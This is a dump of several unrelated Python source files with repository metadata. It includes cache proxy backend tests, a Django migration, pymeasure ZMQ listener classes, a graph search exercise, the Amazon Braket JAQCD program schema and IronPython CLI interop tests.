def __init__(self, never_set, *args, **kwargs):
super(ProxyBackendTest.NeverSetProxy, self).__init__(
*args, **kwargs
)
self.never_set = never_set
self._key_count = defaultdict(lambda: 0)
def set(self, key, value):
if key != self.never_set:
self.proxied.set(key, value)
class CanModifyCachedValueProxy(ProxyBackend):
def get(self, key):
value = ProxyBackend.get(self, key)
assert isinstance(value, CachedValue)
return value
def set(self, key, value):
assert isinstance(value, CachedValue)
ProxyBackend.set(self, key, value)
def _region(self, init_args={}, config_args={}, backend="mock"):
reg = CacheRegion(**init_args)
reg.configure(backend, **config_args)
return reg
def test_cachedvalue_passed(self):
reg = self._region(
config_args={"wrap": [ProxyBackendTest.CanModifyCachedValueProxy]}
)
reg.set("some key", "some value")
eq_(reg.get("some key"), "some value")
def test_counter_proxies(self):
# count up the gets and sets and make sure they are passed through
# to the backend properly. Test that methods not overridden
# continue to work
reg = self._region(
config_args={
"wrap": [
ProxyBackendTest.GetCounterProxy,
ProxyBackendTest.SetCounterProxy,
]
}
)
ProxyBackendTest.GetCounterProxy.counter = 0
ProxyBackendTest.SetCounterProxy.counter = 0
# set a range of values in the cache
for i in range(10):
reg.set(i, i)
eq_(ProxyBackendTest.GetCounterProxy.counter, 0)
eq_(ProxyBackendTest.SetCounterProxy.counter, 10)
# check that the range of values is still there
for i in range(10):
v = reg.get(i)
eq_(v, i)
eq_(ProxyBackendTest.GetCounterProxy.counter, 10)
eq_(ProxyBackendTest.SetCounterProxy.counter, 10)
# make sure the delete function(not overridden) still
# executes properly
for i in range(10):
reg.delete(i)
v = reg.get(i)
is_(v, NO_VALUE)
def test_instance_proxies(self):
# Test that we can create an instance of a new proxy and
# pass that to make_region instead of the class. The two instances
# should not interfere with each other
proxy_num = ProxyBackendTest.UsedKeysProxy(5)
proxy_abc = ProxyBackendTest.UsedKeysProxy(5)
reg_num = self._region(config_args={"wrap": [proxy_num]})
reg_abc = self._region(config_args={"wrap": [proxy_abc]})
for i in range(10):
reg_num.set(i, True)
reg_abc.set(chr(ord("a") + i), True)
for i in range(5):
reg_num.set(i, True)
reg_abc.set(chr(ord("a") + i), True)
# make sure proxy_num has the right counts per key
eq_(proxy_num.setcount(1), 2)
eq_(proxy_num.setcount(9), 1)
eq_(proxy_num.setcount("a"), 0)
# make sure proxy_abc has the right counts per key
eq_(proxy_abc.setcount("a"), 2)
eq_(proxy_abc.setcount("g"), 1)
eq_(proxy_abc.setcount("9"), 0)
def test_argument_proxies(self):
# Test that we can pass an argument to Proxy on creation
proxy = ProxyBackendTest.NeverSetProxy(5)
reg = self._region(config_args={"wrap": [proxy]})
for i in range(10):
reg.set(i, True)
# make sure 1 was set, but 5 was not
eq_(reg.get(5), NO_VALUE)
eq_(reg.get(1), True)
def test_actual_backend_proxied(self):
# ensure that `reg.actual_backend` is the actual backend
# also ensure that `reg.backend` is a proxied backend
reg = self._region(
config_args={
"wrap": [
ProxyBackendTest.GetCounterProxy,
ProxyBackendTest.SetCounterProxy,
]
}
)
assert isinstance(reg.backend, ProxyBackend)
assert isinstance(reg.actual_backend, CacheBackend)
def test_actual_backend_noproxy(self):
# ensure that `reg.actual_backend` is the actual backend
# also ensure that `reg.backend` is NOT a proxied backend
reg = self._region()
assert isinstance(reg.backend, CacheBackend)
assert isinstance(reg.actual_backend, CacheBackend)
| 32.027316 | 79 | 0.585382 |
e476a0dc5a44a251427d75977a9b0e04fd75f916 | 281 | py | Python | common_migration/tests/migration_files/new/central/migrations/0002_add_ideacopy.py | Wazoku/django-common-migration | 51bbb4d3a5a5c76fc5dcf569da9eb7751b82c9eb | [
"BSD-2-Clause"
] | 1 | 2021-06-03T13:49:50.000Z | 2021-06-03T13:49:50.000Z | common_migration/tests/migration_files/old/central/migrations/0002_add_ideacopy.py | Wazoku/django-common-migration | 51bbb4d3a5a5c76fc5dcf569da9eb7751b82c9eb | [
"BSD-2-Clause"
] | 1 | 2020-11-20T09:17:47.000Z | 2020-11-20T09:17:47.000Z | common_migration/tests/migration_files/old/central/migrations/0002_add_ideacopy.py | Wazoku/django-common-migration | 51bbb4d3a5a5c76fc5dcf569da9eb7751b82c9eb | [
"BSD-2-Clause"
] | 1 | 2020-11-16T16:09:22.000Z | 2020-11-16T16:09:22.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-10-29 11:26
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('central', '0001_squashed'),
]
operations = [
]
| 17.5625 | 49 | 0.658363 |
7edf6ca1018b331f9221a2d1c2a92ed9b91f80a8 | 4,526 | py | Python | pymeasure/display/listeners.py | dphaas/pymeasure | 580c33bf5f1e409bb575c46bbd1df682bf27cfe1 | [
"MIT"
] | null | null | null | pymeasure/display/listeners.py | dphaas/pymeasure | 580c33bf5f1e409bb575c46bbd1df682bf27cfe1 | [
"MIT"
] | null | null | null | pymeasure/display/listeners.py | dphaas/pymeasure | 580c33bf5f1e409bb575c46bbd1df682bf27cfe1 | [
"MIT"
] | null | null | null | #
# This file is part of the PyMeasure package.
#
# Copyright (c) 2013-2022 PyMeasure Developers
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import logging
from .Qt import QtCore
from .thread import StoppableQThread
from ..experiment.procedure import Procedure
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
try:
import zmq
import cloudpickle
except ImportError:
zmq = None
cloudpickle = None
log.warning("ZMQ and cloudpickle are required for TCP communication")
class QListener(StoppableQThread):
"""Base class for QThreads that need to listen for messages
on a ZMQ TCP port and can be stopped by a thread- and process-safe
method call
"""
def __init__(self, port, topic='', timeout=0.01):
""" Constructs the Listener object with a subscriber port
over which to listen for messages
:param port: TCP port to listen on
:param topic: Topic to listen on
:param timeout: Timeout in seconds to recheck stop flag
"""
super().__init__()
self.port = port
self.topic = topic
self.context = zmq.Context()
log.debug(f"{self.__class__.__name__} has ZMQ Context: {self.context!r}")
self.subscriber = self.context.socket(zmq.SUB)
self.subscriber.connect('tcp://localhost:%d' % port)
self.subscriber.setsockopt(zmq.SUBSCRIBE, topic.encode())
log.info("%s connected to '%s' topic on tcp://localhost:%d" % (
self.__class__.__name__, topic, port))
self.poller = zmq.Poller()
self.poller.register(self.subscriber, zmq.POLLIN)
self.timeout = timeout
def receive(self, flags=0):
topic, record = self.subscriber.recv_serialized(
deserialize=lambda msg: (msg[0].decode(), cloudpickle.loads(msg[1])),
flags=flags
)
return topic, record
def message_waiting(self):
return self.poller.poll(self.timeout)
def __repr__(self):
return "<{}(port={},topic={},should_stop={})>".format(
self.__class__.__name__, self.port, self.topic, self.should_stop())
class Monitor(QtCore.QThread):
""" Monitor listens for status and progress messages
from a Worker through a queue to ensure no messages
are losts
"""
status = QtCore.QSignal(int)
progress = QtCore.QSignal(float)
log = QtCore.QSignal(object)
worker_running = QtCore.QSignal()
worker_failed = QtCore.QSignal()
worker_finished = QtCore.QSignal() # Distinguished from QThread.finished
worker_abort_returned = QtCore.QSignal()
def __init__(self, queue):
super().__init__()
self.queue = queue
def run(self):
while True:
data = self.queue.get()
if data is None:
break
topic, data = data
if topic == 'status':
self.status.emit(data)
if data == Procedure.RUNNING:
self.worker_running.emit()
elif data == Procedure.FAILED:
self.worker_failed.emit()
elif data == Procedure.FINISHED:
self.worker_finished.emit()
elif data == Procedure.ABORTED:
self.worker_abort_returned.emit()
elif topic == 'progress':
self.progress.emit(data)
elif topic == 'log':
self.log.emit(data)
log.info("Monitor caught stop command")
| 35.359375 | 81 | 0.653999 |
65dce11f353a0d4e0539751544b8f31b381da854 | 2,918 | py | Python | 1_module/D_Graph.py | L4mborg1n1-D14610/Algoritms_and_DataStructure | f61b7434dbc600da02e8ec38648fa84beb160f17 | [
"Xnet",
"X11",
"CECILL-B"
] | null | null | null | 1_module/D_Graph.py | L4mborg1n1-D14610/Algoritms_and_DataStructure | f61b7434dbc600da02e8ec38648fa84beb160f17 | [
"Xnet",
"X11",
"CECILL-B"
] | null | null | null | 1_module/D_Graph.py | L4mborg1n1-D14610/Algoritms_and_DataStructure | f61b7434dbc600da02e8ec38648fa84beb160f17 | [
"Xnet",
"X11",
"CECILL-B"
] | null | null | null | import sys
from collections import deque
class Graph:
def __init__(self):
try:
while True:
line = input().strip('\n')
if line != "":
break
if (line[0:2] == "u ") | (line[0:2] == "d "):
self.__graph_type = line[0]
else:
print("uncorrected graph type")
sys.exit()
self.__start_vertex = line[2:-2]
if (line[-2:] == " b") | (line[-2:] == " d"):
self.__search_type = line[-1]
else:
print("uncorrected search type")
sys.exit()
self.__graph_map = {}
except EOFError:
print("")
def make_graph(self):
while True:
try:
line = input().rstrip('\n')
if line != "":
vertex_list = line.split()
if vertex_list[0] in self.__graph_map:
self.__graph_map[vertex_list[0]].append(vertex_list[1])
else:
self.__graph_map.update({vertex_list[0]: [vertex_list[1]]})
if self.__graph_type == 'u':
if vertex_list[1] in self.__graph_map:
self.__graph_map[vertex_list[1]].append(vertex_list[0])
else:
self.__graph_map.update({vertex_list[1]: [vertex_list[0]]})
except EOFError:
break
for key in self.__graph_map:
self.__graph_map[key].sort()
return
def search(self):
if self.__search_type == 'b':
self.__width_search()
elif self.__search_type == 'd':
self.__deep_search()
def __width_search(self):
visited = set()
vertexes = deque()
vertexes.append(self.__start_vertex)
while vertexes: # not empty
this_vertex = vertexes.popleft()
if this_vertex not in visited:
visited.add(this_vertex)
print(this_vertex)
if this_vertex in self.__graph_map:
for v in self.__graph_map[this_vertex]:
if v not in visited:
vertexes.append(v)
return
def __deep_search(self):
visited = set()
vertexes = deque()
vertexes.append(self.__start_vertex)
while vertexes: # not empty
this_vertex = vertexes.pop()
if this_vertex not in visited:
visited.add(this_vertex)
print(this_vertex)
if this_vertex in self.__graph_map:
for v in reversed(self.__graph_map[this_vertex]):
if v not in visited:
vertexes.append(v)
return
graph = Graph()
graph.make_graph()
graph.search()
| 32.422222 | 87 | 0.48218 |
6938a64cce025ab87630f604571680b033c62556 | 6,780 | py | Python | src/braket/ir/jaqcd/program_v1.py | orclassiq/amazon-braket-schemas-python | 895ccb6c15a678975894b7b13fc91febe914719e | [
"Apache-2.0"
] | null | null | null | src/braket/ir/jaqcd/program_v1.py | orclassiq/amazon-braket-schemas-python | 895ccb6c15a678975894b7b13fc91febe914719e | [
"Apache-2.0"
] | null | null | null | src/braket/ir/jaqcd/program_v1.py | orclassiq/amazon-braket-schemas-python | 895ccb6c15a678975894b7b13fc91febe914719e | [
"Apache-2.0"
] | null | null | null | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from typing import Any, List, Optional, Union
from pydantic import BaseModel, Field, validator
from braket.ir.jaqcd.instructions import (
CV,
CY,
CZ,
XX,
XY,
YY,
ZZ,
AmplitudeDamping,
BitFlip,
CCNot,
CNot,
CPhaseShift,
CPhaseShift00,
CPhaseShift01,
CPhaseShift10,
CSwap,
Depolarizing,
EndVerbatimBox,
GeneralizedAmplitudeDamping,
H,
I,
ISwap,
Kraus,
PauliChannel,
PhaseDamping,
PhaseFlip,
PhaseShift,
PSwap,
Rx,
Ry,
Rz,
S,
Si,
StartVerbatimBox,
Swap,
T,
Ti,
TwoQubitDephasing,
TwoQubitDepolarizing,
Unitary,
V,
Vi,
X,
Y,
Z,
)
from braket.ir.jaqcd.results import (
Amplitude,
DensityMatrix,
Expectation,
Probability,
Sample,
StateVector,
Variance,
)
from braket.schema_common import BraketSchemaBase, BraketSchemaHeader
"""
The pydantic validator requires a constant lookup function. A plain Union[] results
in an O(n) lookup cost for arbitrary payloads, which has a negative impact on model parsing times.
"""
_valid_gates = {
CCNot.Type.ccnot: CCNot,
CNot.Type.cnot: CNot,
CPhaseShift.Type.cphaseshift: CPhaseShift,
CPhaseShift00.Type.cphaseshift00: CPhaseShift00,
CPhaseShift01.Type.cphaseshift01: CPhaseShift01,
CPhaseShift10.Type.cphaseshift10: CPhaseShift10,
CSwap.Type.cswap: CSwap,
CV.Type.cv: CV,
CY.Type.cy: CY,
CZ.Type.cz: CZ,
H.Type.h: H,
I.Type.i: I,
ISwap.Type.iswap: ISwap,
PhaseShift.Type.phaseshift: PhaseShift,
PSwap.Type.pswap: PSwap,
Rx.Type.rx: Rx,
Ry.Type.ry: Ry,
Rz.Type.rz: Rz,
S.Type.s: S,
Swap.Type.swap: Swap,
Si.Type.si: Si,
T.Type.t: T,
Ti.Type.ti: Ti,
Unitary.Type.unitary: Unitary,
V.Type.v: V,
Vi.Type.vi: Vi,
X.Type.x: X,
XX.Type.xx: XX,
XY.Type.xy: XY,
Y.Type.y: Y,
YY.Type.yy: YY,
Z.Type.z: Z,
ZZ.Type.zz: ZZ,
}
_valid_noise_channels = {
BitFlip.Type.bit_flip: BitFlip,
PhaseFlip.Type.phase_flip: PhaseFlip,
Depolarizing.Type.depolarizing: Depolarizing,
AmplitudeDamping.Type.amplitude_damping: AmplitudeDamping,
GeneralizedAmplitudeDamping.Type.generalized_amplitude_damping: GeneralizedAmplitudeDamping,
PauliChannel.Type.pauli_channel: PauliChannel,
PhaseDamping.Type.phase_damping: PhaseDamping,
TwoQubitDephasing.Type.two_qubit_dephasing: TwoQubitDephasing,
TwoQubitDepolarizing.Type.two_qubit_depolarizing: TwoQubitDepolarizing,
Kraus.Type.kraus: Kraus,
}
_valid_compiler_directives = {
StartVerbatimBox.Type.start_verbatim_box: StartVerbatimBox,
EndVerbatimBox.Type.end_verbatim_box: EndVerbatimBox,
}
Results = Union[Amplitude, Expectation, Probability, Sample, StateVector, DensityMatrix, Variance]
class Program(BraketSchemaBase):
"""
Root object of the JsonAwsQuantumCircuitDescription IR.
Attributes:
braketSchemaHeader (BraketSchemaHeader): Schema header. Users do not need
to set this value. Only default is allowed.
instructions (List[Any]): List of instructions.
basis_rotation_instructions (List[Any]): List of instructions for
rotation to desired measurement bases. Default is None.
results (List[Union[Amplitude, Expectation, Probability, Sample, StateVector,
DensityMatrix, Variance]]):
List of requested results. Default is None.
Examples:
>>> Program(instructions=[H(target=0), Rz(angle=0.15, target=1)])
>>> Program(instructions=[H(target=0), CNot(control=0, target=1)],
... results=[Expectation(targets=[0], observable=['x'])],
... basis_rotation_instructions=[H(target=0)])
Note:
The following instructions are supported:
AmplitudeDamping,
BitFlip,
CCNot,
CNot,
CPhaseShift,
CPhaseShift00,
CPhaseShift01,
CPhaseShift10,
CSwap,
CV,
CY,
CZ,
Depolarizing,
GeneralizedAmplitudeDamping,
Pauli_channel,
H,
I,
ISwap,
Kraus,
PhaseDamping
PhaseFlip,
PhaseShift,
PSwap,
Rx,
Ry,
Rz,
S,
Swap,
Si,
T,
Ti,
TwoQubitDephasing,
TwoQubitDepolarizing,
Unitary,
V,
Vi,
X,
XX,
XY,
Y,
YY,
Z,
ZZ
"""
_PROGRAM_HEADER = BraketSchemaHeader(name="braket.ir.jaqcd.program", version="1")
braketSchemaHeader: BraketSchemaHeader = Field(default=_PROGRAM_HEADER, const=_PROGRAM_HEADER)
instructions: List[Any]
results: Optional[List[Results]]
basis_rotation_instructions: Optional[List[Any]]
@validator("instructions", "basis_rotation_instructions", each_item=True, pre=True)
def validate_instructions(cls, value, field):
"""
Pydantic uses the validation subsystem to create objects. This custom validator has
2 purposes:
1. Implement O(1) deserialization
2. Validate that the input instructions are supported
"""
if isinstance(value, BaseModel):
if (
(value.type not in _valid_gates)
and (value.type not in _valid_noise_channels)
and (value.type not in _valid_compiler_directives)
):
raise ValueError(f"Invalid value.type specified: {value} for field: {field}")
return value
if value is not None and "type" in value:
if value["type"] in _valid_gates:
return _valid_gates[value["type"]](**value)
elif value["type"] in _valid_noise_channels:
return _valid_noise_channels[value["type"]](**value)
elif value["type"] in _valid_compiler_directives:
return _valid_compiler_directives[value["type"]](**value)
else:
raise ValueError(f"Invalid instruction specified: {value} for field: {field}")
else:
raise ValueError(f"Invalid type or value specified: {value} for field: {field}")
| 28.368201 | 98 | 0.642625 |
c7528dcabc0793e7539426aa82e0cc946cc27231 | 70,775 | py | Python | Tests/test_cliclass.py | caoyongxu/ironpython3 | a3e245dd4803b82ffcf6836de522a8ab4ed8e5d5 | [
"Apache-2.0"
] | null | null | null | Tests/test_cliclass.py | caoyongxu/ironpython3 | a3e245dd4803b82ffcf6836de522a8ab4ed8e5d5 | [
"Apache-2.0"
] | null | null | null | Tests/test_cliclass.py | caoyongxu/ironpython3 | a3e245dd4803b82ffcf6836de522a8ab4ed8e5d5 | [
"Apache-2.0"
] | null | null | null | # Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
import sys
import unittest
from iptest import IronPythonTestCase, is_cli, is_debug, is_mono, is_netcoreapp, is_netcoreapp21, is_posix, big, run_test, skipUnlessIronPython
if is_cli:
import clr
import System
@skipUnlessIronPython()
class CliClassTestCase(IronPythonTestCase):
def assertNotWarns(self, warning, callable, *args, **kwds):
import warnings
with warnings.catch_warnings(record=True) as warning_list:
warnings.simplefilter('always')
result = callable(*args, **kwds)
self.assertFalse(any(item.category == warning for item in warning_list))
def setUp(self):
super(CliClassTestCase, self).setUp()
self.load_iron_python_test()
def test_inheritance(self):
import System
class MyList(System.Collections.Generic.List[int]):
def get0(self):
return self[0]
l = MyList()
index = l.Add(22)
self.assertTrue(l.get0() == 22)
def test_interface_inheritance(self):
"""Verify we can inherit from a class that inherits from an interface"""
class MyComparer(System.Collections.IComparer):
def Compare(self, x, y): return 0
class MyDerivedComparer(MyComparer): pass
class MyFurtherDerivedComparer(MyDerivedComparer): pass
# Check that MyDerivedComparer and MyFurtherDerivedComparer can be used as an IComparer
array = System.Array[int](list(range(10)))
System.Array.Sort(array, 0, 10, MyComparer())
System.Array.Sort(array, 0, 10, MyDerivedComparer())
System.Array.Sort(array, 0, 10, MyFurtherDerivedComparer())
def test_inheritance_generic_method(self):
"""Verify we can inherit from an interface containing a generic method"""
from IronPythonTest import IGenericMethods, GenericMethodTester
class MyGenericMethods(IGenericMethods):
def Factory0(self, TParam = None):
self.type = clr.GetClrType(TParam).FullName
return TParam("123")
def Factory1(self, x, T):
self.type = clr.GetClrType(T).FullName
return T("456") + x
def OutParam(self, x, T):
x.Value = T("2")
return True
def RefParam(self, x, T):
x.Value = x.Value + T("10")
def Wild(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.args[2].Value = kwargs['T2']('1.5')
return self.args[3][0]
c = MyGenericMethods()
self.assertEqual(GenericMethodTester.TestIntFactory0(c), 123)
self.assertEqual(c.type, 'System.Int32')
self.assertEqual(GenericMethodTester.TestStringFactory1(c, "789"), "456789")
self.assertEqual(c.type, 'System.String')
self.assertEqual(GenericMethodTester.TestIntFactory1(c, 321), 777)
self.assertEqual(c.type, 'System.Int32')
self.assertEqual(GenericMethodTester.TestStringFactory0(c), '123')
self.assertEqual(c.type, 'System.String')
self.assertEqual(GenericMethodTester.TestOutParamString(c), '2')
self.assertEqual(GenericMethodTester.TestOutParamInt(c), 2)
self.assertEqual(GenericMethodTester.TestRefParamString(c, '10'), '1010')
self.assertEqual(GenericMethodTester.TestRefParamInt(c, 10), 20)
x = System.Collections.Generic.List[System.Int32]((2, 3, 4))
r = GenericMethodTester.GoWild(c, True, 'second', x)
self.assertEqual(r.Length, 2)
self.assertEqual(r[0], 1.5)
x = System.Collections.Generic.List[int]((2, 3, 4))
r = GenericMethodTester.GoWildBig(c, True, 'second', x)
self.assertEqual(r.Length, 2)
self.assertEqual(r[0], 1.5)
def test_bases(self):
#
# Verify that changing __bases__ works
#
class MyExceptionComparer(System.Exception, System.Collections.IComparer):
def Compare(self, x, y): return 0
class MyDerivedExceptionComparer(MyExceptionComparer): pass
e = MyExceptionComparer()
MyDerivedExceptionComparer.__bases__ = (System.Exception, System.Collections.IComparer)
MyDerivedExceptionComparer.__bases__ = (MyExceptionComparer,)
class NewType:
def NewTypeMethod(self): return "NewTypeMethod"
class MyOtherExceptionComparer(System.Exception, System.Collections.IComparer, NewType):
def Compare(self, x, y): return 0
MyExceptionComparer.__bases__ = MyOtherExceptionComparer.__bases__
self.assertEqual(e.NewTypeMethod(), "NewTypeMethod")
self.assertTrue(isinstance(e, System.Exception))
self.assertTrue(isinstance(e, System.Collections.IComparer))
self.assertTrue(isinstance(e, MyExceptionComparer))
class MyIncompatibleExceptionComparer(System.Exception, System.Collections.IComparer, System.IDisposable):
def Compare(self, x, y): return 0
def Displose(self): pass
self.assertRaisesRegex(TypeError, "__bases__ assignment: 'MyExceptionComparer' object layout differs from 'IronPython.NewTypes.System.Exception#IComparer#IDisposable_*",
setattr, MyExceptionComparer, "__bases__", MyIncompatibleExceptionComparer.__bases__)
self.assertRaisesRegex(TypeError, "__class__ assignment: 'MyExceptionComparer' object layout differs from 'IronPython.NewTypes.System.Exception#IComparer#IDisposable_*",
setattr, MyExceptionComparer(), "__class__", MyIncompatibleExceptionComparer().__class__)
def test_open_generic(self):
# Inherting from an open generic instantiation should fail with a good error message
try:
class Foo(System.Collections.Generic.IEnumerable): pass
except TypeError:
(exc_type, exc_value, exc_traceback) = sys.exc_info()
self.assertTrue(str(exc_value).__contains__("cannot inhert from open generic instantiation"))
def test_interface_slots(self):
# slots & interfaces
class foo(object):
__slots__ = ['abc']
class bar(foo, System.IComparable):
def CompareTo(self, other):
return 23
class baz(bar): pass
def test_op_Implicit_inheritance(self):
"""should inherit op_Implicit from base classes"""
from IronPythonTest import NewClass
a = NewClass()
self.assertEqual(int(a), 1002)
self.assertEqual(int(a), 1002)
self.assertEqual(NewClass.op_Implicit(a), 1002)
def test_symbol_dict(self):
"""tests to verify that Symbol dictionaries do the right thing in dynamic scenarios
same as the tests in test_class, but we run this in a module that has imported clr"""
def CheckDictionary(C):
# add a new attribute to the type...
C.newClassAttr = 'xyz'
self.assertEqual(C.newClassAttr, 'xyz')
# add non-string index into the class and instance dictionary
a = C()
try:
a.__dict__[1] = '1'
C.__dict__[2] = '2'
self.assertEqual(1 in a.__dict__, True)
self.assertEqual(2 in C.__dict__, True)
self.assertEqual(dir(a).__contains__(1), True)
self.assertEqual(dir(a).__contains__(2), True)
self.assertEqual(dir(C).__contains__(2), True)
self.assertEqual(repr(a.__dict__), "{1: '1'}")
self.assertEqual(repr(C.__dict__).__contains__("2: '2'"), True)
except TypeError:
# new-style classes have dict-proxy, can't do the assignment
pass
# replace a class dictionary (containing non-string keys) w/ a normal dictionary
C.newTypeAttr = 1
self.assertEqual(hasattr(C, 'newTypeAttr'), True)
try:
C.__dict__ = {}
self.fail("Unreachable code reached")
except AttributeError:
pass
# replace an instance dictionary (containing non-string keys) w/ a new one.
a.newInstanceAttr = 1
self.assertEqual(hasattr(a, 'newInstanceAttr'), True)
a.__dict__ = dict(a.__dict__)
self.assertEqual(hasattr(a, 'newInstanceAttr'), True)
a.abc = 'xyz'
self.assertEqual(hasattr(a, 'abc'), True)
self.assertEqual(getattr(a, 'abc'), 'xyz')
class NewClass(object):
def __init__(self): pass
CheckDictionary(NewClass)
def test_generic_TypeGroup(self):
# TypeGroup is used to expose "System.IComparable" and "System.IComparable`1" as "System.IComparable"
# repr
self.assertEqual(repr(System.IComparable), "<types 'IComparable', 'IComparable[T]'>")
# Test member access
self.assertEqual(System.IComparable.CompareTo(1,1), 0)
self.assertEqual(System.IComparable.CompareTo(1,2), -1)
self.assertEqual(System.IComparable[int].CompareTo(1,1), 0)
self.assertEqual(System.IComparable[int].CompareTo(1,2), -1)
self.assertEqual(System.IComparable[System.Int32].CompareTo(System.Int32(1),System.Int32(1)), 0)
self.assertEqual(System.IComparable[System.Int32].CompareTo(System.Int32(1),System.Int32(2)), -1)
self.assertEqual(System.IComparable[int].CompareTo(big(1),big(1)), 0)
self.assertEqual(System.IComparable[int].CompareTo(big(1),big(2)), -1)
self.assertTrue(dir(System.IComparable).__contains__("CompareTo"))
self.assertTrue(list(vars(System.IComparable).keys()).__contains__("CompareTo"))
import IronPythonTest
genericTypes = IronPythonTest.NestedClass.InnerGenericClass
# converstion to Type
self.assertTrue(System.Type.IsAssignableFrom(System.IComparable, int))
self.assertRaises(TypeError, System.Type.IsAssignableFrom, object, genericTypes)
# Test illegal type instantiation
try:
System.IComparable[int, int]
except ValueError: pass
else: self.fail("Unreachable code reached")
try:
System.EventHandler(None)
except TypeError: pass
else: self.fail("Unreachable code reached")
def handler():
pass
try:
System.EventHandler(handler)("sender", None)
except TypeError: pass
else: self.fail("Unreachable code reached")
def handler(s,a):
pass
# Test constructor
self.assertEqual(System.EventHandler(handler).GetType(), System.Type.GetType("System.EventHandler"))
self.assertEqual(System.EventHandler[System.EventArgs](handler).GetType().GetGenericTypeDefinition(), System.Type.GetType("System.EventHandler`1"))
# Test inheritance
class MyComparable(System.IComparable):
def CompareTo(self, other):
return self.Equals(other)
myComparable = MyComparable()
self.assertTrue(myComparable.CompareTo(myComparable))
try:
class MyDerivedClass(genericTypes): pass
except TypeError: pass
else: self.fail("Unreachable code reached")
# Use a TypeGroup to index a TypeGroup
t = genericTypes[System.IComparable]
t = genericTypes[System.IComparable, int]
try:
System.IComparable[genericTypes]
except TypeError: pass
else: self.fail("Unreachable code reached")
def test_generic_only_TypeGroup(self):
from IronPythonTest import BinderTest
try:
BinderTest.GenericOnlyConflict()
except System.TypeLoadException as e:
self.assertTrue(str(e).find('requires a non-generic type') != -1)
self.assertTrue(str(e).find('GenericOnlyConflict') != -1)
def test_autodoc(self):
import os
from System.Threading import Thread, ThreadStart
self.assertTrue(Thread.__doc__.find('Thread(start: ThreadStart)') != -1)
self.assertTrue(Thread.__new__.__doc__.find('__new__(cls: type, start: ThreadStart)') != -1)
# self.assertEqual(Thread.__new__.Overloads[ThreadStart].__doc__, '__new__(cls : type, start: ThreadStart)' + os.linesep)
def test_type_descs(self):
from IronPythonTest import TypeDescTests
if is_netcoreapp:
clr.AddReference("System.ComponentModel.Primitives")
test = TypeDescTests()
# new style tests
class bar(int): pass
b = bar(2)
class foo(object): pass
c = foo()
#test.TestProperties(...)
res = test.GetClassName(test)
self.assertTrue(res == 'IronPythonTest.TypeDescTests')
#res = test.GetClassName(a)
#self.assertTrue(res == 'list')
res = test.GetClassName(c)
self.assertTrue(res == 'foo')
res = test.GetClassName(b)
self.assertTrue(res == 'bar')
res = test.GetConverter(b)
x = res.ConvertTo(None, None, b, int)
self.assertTrue(x == 2)
self.assertTrue(type(x) == int)
x = test.GetDefaultEvent(b)
self.assertTrue(x == None)
x = test.GetDefaultProperty(b)
self.assertTrue(x == None)
x = test.GetEditor(b, object)
self.assertTrue(x == None)
x = test.GetEvents(b)
self.assertTrue(x.Count == 0)
x = test.GetEvents(b, None)
self.assertTrue(x.Count == 0)
x = test.GetProperties(b)
self.assertTrue(x.Count > 0)
self.assertTrue(test.TestProperties(b, [], []))
bar.foobar = property(lambda x: 42)
self.assertTrue(test.TestProperties(b, ['foobar'], []))
bar.baz = property(lambda x:42)
self.assertTrue(test.TestProperties(b, ['foobar', 'baz'], []))
delattr(bar, 'baz')
self.assertTrue(test.TestProperties(b, ['foobar'], ['baz']))
# Check that adding a non-string entry in the dictionary does not cause any grief.
b.__dict__[1] = 1
self.assertTrue(test.TestProperties(b, ['foobar'], ['baz']))
#self.assertTrue(test.TestProperties(test, ['GetConverter', 'GetEditor', 'GetEvents', 'GetHashCode'] , []))
# old style tests
class foo: pass
a = foo()
self.assertTrue(test.TestProperties(a, [], []))
res = test.GetClassName(a)
self.assertTrue(res == 'foo')
x = test.CallCanConvertToForInt(a)
self.assertTrue(x == False)
x = test.GetDefaultEvent(a)
self.assertTrue(x == None)
x = test.GetDefaultProperty(a)
self.assertTrue(x == None)
x = test.GetEditor(a, object)
self.assertTrue(x == None)
x = test.GetEvents(a)
self.assertTrue(x.Count == 0)
x = test.GetEvents(a, None)
self.assertTrue(x.Count == 0)
x = test.GetProperties(a, (System.ComponentModel.BrowsableAttribute(True), ))
self.assertTrue(x.Count == 0)
foo.bar = property(lambda x:'hello')
self.assertTrue(test.TestProperties(a, ['bar'], []))
delattr(foo, 'bar')
self.assertTrue(test.TestProperties(a, [], ['bar']))
a = a.__class__
self.assertTrue(test.TestProperties(a, [], []))
foo.bar = property(lambda x:'hello')
self.assertTrue(test.TestProperties(a, [], []))
delattr(a, 'bar')
self.assertTrue(test.TestProperties(a, [], ['bar']))
x = test.GetClassName(a)
self.assertEqual(x, 'IronPython.Runtime.Types.PythonType')
x = test.CallCanConvertToForInt(a)
self.assertEqual(x, False)
x = test.GetDefaultEvent(a)
self.assertEqual(x, None)
